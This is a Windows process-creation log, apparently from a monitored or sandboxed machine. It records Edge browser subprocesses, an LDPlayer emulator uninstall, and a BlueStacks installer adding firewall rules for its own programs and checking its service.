"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8720 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7836 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7692 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=8804 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8788 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7216 /prefetch:8
C:\Windows\system32\control.exe
"C:\Windows\system32\control.exe" /name Microsoft.DeviceManager
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe" C:\Windows\system32\devmgmt.msc
C:\Windows\System32\control.exe
"C:\Windows\System32\control.exe" "C:\Windows\system32\appwiz.cpl",
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\appwiz.cpl",
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}
F:\LDPlayer\LDPlayer9\dnuninst.exe
"F:\LDPlayer\LDPlayer9\dnuninst.exe"
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /F /IM adb.exe /T
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /F /IM aapt.exe
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /F /IM ldrecord.exe
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /F /IM dndscd.exe
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /F /IM fynews.exe
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /F /IM ldnews.exe
F:\LDPlayer\LDPlayer9\dnrepairer.exe
"F:\LDPlayer\LDPlayer9\\dnrepairer.exe" cmd=uninstall
C:\Program Files\ldplayer9box\Ld9BoxSVC.exe
"C:\Program Files\ldplayer9box\Ld9BoxSVC.exe" /UnregServer
C:\Windows\SysWOW64\regsvr32.exe
"regsvr32" "C:\Program Files\ldplayer9box\x86\VBoxClient-x86.dll" /s /u
C:\Windows\SYSTEM32\regsvr32.exe
"regsvr32" "C:\Program Files\ldplayer9box\VBoxC.dll" /s /u
C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc" stop Ld9BoxSup
C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc" delete Ld9BoxSup
C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc" stop Ld9BoxNetLwf
C:\Program Files\ldplayer9box\NetLwfUninstall.exe
"C:\Program Files\ldplayer9box\NetLwfUninstall.exe"
C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM dnmultiplayerex.exe
C:\Users\Admin\AppData\Local\Temp\ld\lduninst_del.exe
"C:\Users\Admin\AppData\Local\Temp\ld\lduninst_del.exe" F:\LDPlayer\LDPlayer9\
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2848 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7636 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8876 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10876 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7456 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10904 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10668 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7228 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=112 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10804 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10628 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10888 /prefetch:8
C:\Users\Admin\Downloads\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe
"C:\Users\Admin\Downloads\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\BlueStacksInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\BlueStacksInstaller.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\HD-CheckCpu.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\HD-CheckCpu.exe" --cmd checkHypervEnabled
C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\HD-CheckCpu.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\HD-CheckCpu.exe" --cmd checkSSE4
C:\Users\Admin\AppData\Local\BlueStacksSetup\BSX-Setup-5.14.22.1003_nxt.exe
"C:\Users\Admin\AppData\Local\BlueStacksSetup\BSX-Setup-5.14.22.1003_nxt.exe" -s -cpath=F:/
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "F:\BlueStacks X\green.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c green.bat
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="BlueStacksWeb"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="Cloud Game"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="BlueStacksWeb" dir=in action=allow program="F:\BlueStacks X\BlueStacksWeb.exe"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Cloud Game" dir=in action=allow program="F:\BlueStacks X\Cloud Game.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10132 /prefetch:1
C:\Users\Admin\AppData\Local\BlueStacksSetup\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe
"C:\Users\Admin\AppData\Local\BlueStacksSetup\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe" -versionMachineID=27eb52f0-7c66-4fcd-a395-7a81e9b2975a -machineID=7636e141-ab64-4cdc-837e-a924a6eee602 -pddir="F:\BlueStacks_nxt" -defaultImageName=Pie64 -imageToLaunch=Pie64 -isSSE4Available=1 -appToLaunch=bs5 -bsxVersion=10.5.22.1006 -country=GB -isWalletFeatureEnabled
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\Bootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\Bootstrapper.exe" -versionMachineID=27eb52f0-7c66-4fcd-a395-7a81e9b2975a -machineID=7636e141-ab64-4cdc-837e-a924a6eee602 -pddir="F:\BlueStacks_nxt" -defaultImageName=Pie64 -imageToLaunch=Pie64 -isSSE4Available=1 -appToLaunch=bs5 -bsxVersion=10.5.22.1006 -country=GB -isWalletFeatureEnabled
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\BlueStacksInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\BlueStacksInstaller.exe" -versionMachineID="27eb52f0-7c66-4fcd-a395-7a81e9b2975a" -machineID="7636e141-ab64-4cdc-837e-a924a6eee602" -pddir="F:\BlueStacks_nxt" -defaultImageName="Pie64" -imageToLaunch="Pie64" -appToLaunch="bs5" -bsxVersion="10.5.22.1006" -country="GB" -isWalletFeatureEnabled -parentpath="C:\Users\Admin\AppData\Local\BlueStacksSetup\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe" -md5=e0175934c4a0a56f1db683585ffd1bcf -app64=
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\CommonInstallUtils.zip" -o"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\" -aoa
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\QtRedistx64.zip" -o"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\" -aoa
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-ForceGPU.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-ForceGPU.exe" 1 "C:\Program Files\BlueStacks_nxt"
C:\ProgramData\BlueStacksServicesSetup.exe
"C:\ProgramData\BlueStacksServicesSetup.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq BlueStacksServices.exe" | find "BlueStacksServices.exe"
C:\Windows\SysWOW64\tasklist.exe
